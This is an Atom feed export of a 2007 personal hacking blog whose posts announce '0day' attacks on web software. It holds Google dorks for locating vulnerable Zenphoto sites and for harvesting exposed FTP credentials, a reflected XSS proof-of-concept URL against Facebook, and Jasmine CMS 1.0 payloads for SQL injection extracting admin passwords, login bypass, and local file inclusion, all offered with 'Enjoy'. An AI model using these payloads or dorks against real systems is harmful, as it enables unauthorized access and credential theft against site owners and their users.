<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-551083456466115000</id><updated>2012-02-05T11:16:15.134Z</updated><title type='text'>Silentz's Blog</title><subtitle type='html'>Just thought i'd start a little blog going it would be a good central location to post my 0days and just general InfoSec stuff.

But my main hangout is at w4ck1ng (www.w4ck1ng.com).</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://silentzzz.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/551083456466115000/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://silentzzz.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Silentz</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>5</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-551083456466115000.post-2575072166424930108</id><published>2007-12-31T15:52:00.000Z</published><updated>2007-12-31T15:57:15.196Z</updated><title type='text'>Zenphoto 1.1.3 SQL Injection Exploit</title><content type='html'>Hey Guys,&lt;br /&gt;&lt;br /&gt;Been out of action for a while. Was a bit bored at work today so i decided to break something...and so i did.&lt;br /&gt;&lt;br /&gt;This is a SQL Injection exploit that'll retrieve the admin username and password. Currently this script only work's on v 1.1.3 BUT the vulnerability exists in 1.1 - 1.1.3, just can't be bothered to script it as they seem to have a different schema every time they release a new version.&lt;br /&gt;&lt;br /&gt;The script is buggered as i can't be bothered to add all the table prefix stuff etc. You can easily change the table prefix though.&lt;br /&gt;&lt;br /&gt;GoogleDork:&lt;br /&gt;"Powered by zenphoto"&lt;br /&gt;"Powered by zenphoto" +rss&lt;br /&gt;&lt;br /&gt;Enjoy...&lt;br /&gt;&lt;br /&gt;https://www.w4ck1ng.com/board/showthread.php/&lt;br /&gt;0day-zenphoto-1-1-6775.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/551083456466115000-2575072166424930108?l=silentzzz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://silentzzz.blogspot.com/feeds/2575072166424930108/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=551083456466115000&amp;postID=2575072166424930108' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/551083456466115000/posts/default/2575072166424930108'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/551083456466115000/posts/default/2575072166424930108'/><link rel='alternate' type='text/html' href='http://silentzzz.blogspot.com/2007/12/zenphoto-113-sql-injection-exploit.html' title='Zenphoto 1.1.3 SQL Injection Exploit'/><author><name>Silentz</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-551083456466115000.post-3921614511227163788</id><published>2007-11-01T00:48:00.001Z</published><updated>2007-11-05T19:24:00.821Z</updated><title type='text'>Facebook XSS Vulnerability</title><content type='html'>Hey Peepz,&lt;br /&gt;&lt;br /&gt;So, browsing away on Facebook the other week, then i wondered if Facebook was as riddled with holes like MySpace was a while back. It seems not...but still has a few ;)&lt;br /&gt;&lt;br /&gt;Anyways, I don't need to explain to you the possibilities of what you can do with XSS and a social networking website so I'll just give you the vulnerability.&lt;br /&gt;&lt;br /&gt;PoC:&lt;br /&gt;&lt;blockquote&gt;http://www.facebook.com/tos.php?api_key=cc56c58d50d83b35691e7b1783ca925f&amp;auth_token=&lt;br /&gt;%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;I heard Facebook were pretty swift with their patches, let's put that to the test...clock's ticking.&lt;br /&gt;&lt;br /&gt;Silentz&lt;br /&gt;&lt;br /&gt;EDIT:&lt;br /&gt;Fixed as of 05/11/07&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/551083456466115000-3921614511227163788?l=silentzzz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://silentzzz.blogspot.com/feeds/3921614511227163788/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=551083456466115000&amp;postID=3921614511227163788' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/551083456466115000/posts/default/3921614511227163788'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/551083456466115000/posts/default/3921614511227163788'/><link rel='alternate' type='text/html' href='http://silentzzz.blogspot.com/2007/11/facebook-xss-vulnerability.html' title='Facebook XSS Vulnerability'/><author><name>Silentz</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-551083456466115000.post-7640477439974049120</id><published>2007-06-19T21:09:00.000+01:00</published><updated>2007-06-19T22:06:11.732+01:00</updated><title type='text'>Google indexes FTP Credentials from YouTube...How Ironic!</title><content type='html'>Lyecdevf (a member of the w4ck1ng community) recently started a thread on how Google indexes plain-text FTP credentials of YouTube users.&lt;br /&gt;&lt;br /&gt;In his own words:&lt;br /&gt;&lt;br /&gt;"This is basically a google dork. What basically happens is that if someone is logged in to his/her FTP account and checks a page which embeds a YouTube video through the FTP client, YouTube will register that as a hit from "username&lt;username&gt;:password&lt;passord&gt;@domain.tld", simply put.&lt;br /&gt;&lt;br /&gt;Which means that you are going to get his login information to his FTP server. Enjoy!&lt;br /&gt;&lt;br /&gt;site:youtube.com "clicks from ftp @""&lt;br /&gt;&lt;br /&gt;Which is a pretty cool find. But does anybody see the irony in this? I certainly do!&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Original Thread:&lt;/strong&gt;&lt;br /&gt;http://www.w4ck1ng.com/board/showthread.php/new-youtube-exploit-ftp-5521.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/551083456466115000-7640477439974049120?l=silentzzz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://silentzzz.blogspot.com/feeds/7640477439974049120/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=551083456466115000&amp;postID=7640477439974049120' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/551083456466115000/posts/default/7640477439974049120'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/551083456466115000/posts/default/7640477439974049120'/><link rel='alternate' type='text/html' href='http://silentzzz.blogspot.com/2007/06/google-indexes-ftp-credentials-from.html' title='Google indexes FTP Credentials from YouTube...How Ironic!'/><author><name>Silentz</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-551083456466115000.post-3694098669016364262</id><published>2007-06-19T19:27:00.000+01:00</published><updated>2007-06-19T21:06:20.428+01:00</updated><title type='text'>Multiple Vulnerabilities In Jasmine CMS 1.0</title><content type='html'>&lt;strong&gt;Multiple Vulnerabilities In Jasmine CMS 1.0&lt;br /&gt;&lt;br /&gt;&lt;/strong&gt;Foreword:&lt;br /&gt;&lt;strong&gt;&lt;br /&gt;&lt;/strong&gt;If your thinking about installing this appauling CMS, please think again! The developer clearly has no regard for the integrity of the information being used by the app. To list all the possible vulnerablities would just be silly so i'll list one of every attack type:&lt;br /&gt;&lt;strong&gt;&lt;br /&gt;SQL Injection:&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;news.php?item=-999 UNION SELECT 0,password,0,0,0,0,username FROM user WHERE id=1/*&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Admin Login Bypass:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Username = ' UNION SELECT id,username,email,signature,avatar_path,joined,total_visits,status FROM user WHERE id = '1'/*&lt;br /&gt;&lt;br /&gt;Password = Anything or Nothing&lt;br /&gt;&lt;strong&gt;&lt;br /&gt;&lt;/strong&gt;&lt;strong&gt;Local File Inclusion:&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;admin/plugin_manager.php?u=[PATH TO LOCAL FILE]%00&lt;br /&gt;&lt;br /&gt;...and i'm pretty sure there are tons of XSS vulns in here too.&lt;br /&gt;&lt;br /&gt;Exploit:&lt;br /&gt;&lt;br /&gt;http://www.w4ck1ng.com/board/showthread.php/0day-jasmine-cms-1-5525.html?p=22785&lt;br /&gt;http://milw0rm.com/exploits/4081&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;br /&gt;&lt;/strong&gt;&lt;strong&gt;&lt;br /&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/551083456466115000-3694098669016364262?l=silentzzz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://silentzzz.blogspot.com/feeds/3694098669016364262/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=551083456466115000&amp;postID=3694098669016364262' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/551083456466115000/posts/default/3694098669016364262'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/551083456466115000/posts/default/3694098669016364262'/><link rel='alternate' type='text/html' href='http://silentzzz.blogspot.com/2007/06/multiple-vulnerabilities-in-jasmine-cms.html' title='Multiple Vulnerabilities In Jasmine CMS 1.0'/><author><name>Silentz</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-551083456466115000.post-1493168119779173364</id><published>2007-06-18T18:05:00.000+01:00</published><updated>2007-06-18T18:14:14.802+01:00</updated><title type='text'>First post, but someone took my site!</title><content type='html'>&lt;div align="justify"&gt;So i finally decided to get with the times and start up my own weblog. I don't usually conform to online trends like MySpace, Facebook &amp;amp; blogs in general. That doesn't mean i don't like visiting other peoples'...just don't like playing along.&lt;br /&gt;&lt;br /&gt;So there's me thinking i'm gonna have a nice blog url to give people (silentz.blogspot.com)...but no, someone already took that about 5 years ago and decided not to use it! Oh well, geuss i'll have to make do with the one i've got.&lt;br /&gt;&lt;br /&gt;This blog will be more or less a place for me to release my exploits but more of a place to ramble on about the actual vulnerability. Also to just air my views on general information security issues and whatnot.&lt;br /&gt;&lt;br /&gt;I hope you enjoy it!&lt;br /&gt;Silentz&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/551083456466115000-1493168119779173364?l=silentzzz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://silentzzz.blogspot.com/feeds/1493168119779173364/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=551083456466115000&amp;postID=1493168119779173364' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/551083456466115000/posts/default/1493168119779173364'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/551083456466115000/posts/default/1493168119779173364'/><link rel='alternate' type='text/html' href='http://silentzzz.blogspot.com/2007/06/first-post-but-someone-took-my-site.html' title='First post, but someone took my site!'/><author><name>Silentz</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
